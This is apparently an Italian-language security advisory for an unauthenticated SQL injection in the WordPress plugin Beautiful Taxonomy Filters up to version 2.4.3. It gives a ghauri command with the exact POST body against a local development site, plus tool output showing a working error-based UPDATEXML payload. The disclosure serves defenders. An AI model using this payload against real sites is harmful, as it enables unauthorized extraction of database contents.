
Beautiful Taxonomy Filters <= 2.4.3 - Iniezione SQL non autenticata
Beautiful Taxonomy Filters <= 2.4.3 - SQL Injection non autenticata
Il plugin Beautiful Taxonomy Filters per WordPress è vulnerabile a SQL Injection tramite il parametro 'selects[0][term]' in tutte le versioni fino alla 2.4.3 inclusa, a causa di un insufficiente escaping del parametro fornito dall'utente e della mancanza di una preparazione adeguata della query SQL esistente. Ciò consente ad attaccanti non autenticati di aggiungere query SQL aggiuntive alle query già esistenti, che possono essere utilizzate per estrarre informazioni sensibili dal database.
ghauri -u 'https://wp-dev.ddev.site:443/wp-admin/admin-ajax.php' --data='action=update_filters_callback&selects[0][term]=1&selects[0][operator]=AND&selects[1][term]=1&selects[1][operator]=AND&nonce=d6180bd74e' --level=3 --dbms='mysql'
[13:21:20] [INFO] POST parameter 'selects[0][term]' appears to be 'MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' injectable
POST parameter 'selects[0][term]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
Ghauri identified the following injection point(s) with a total of 675 HTTP(s) requests:
---
Parameter: selects[0][term] (POST)
Type: error-based
Title: MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
Payload: action=update_filters_callback&selects[0][term]=1 AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)-- wXyW&selects[0][operator]=AND&selects[1][term]=1&selects[1][operator]=AND
---
[13:21:25] [INFO] testing MySQL
[13:21:25] [INFO] confirming MySQL
[13:21:25] [INFO] the back-end DBMS is MySQL
[13:21:25] [INFO] fetched data logged to text files under '/Users/me/.ghauri/wp-dev.ddev.site'
[*] ending @ 13:21:25 /2024-12-09/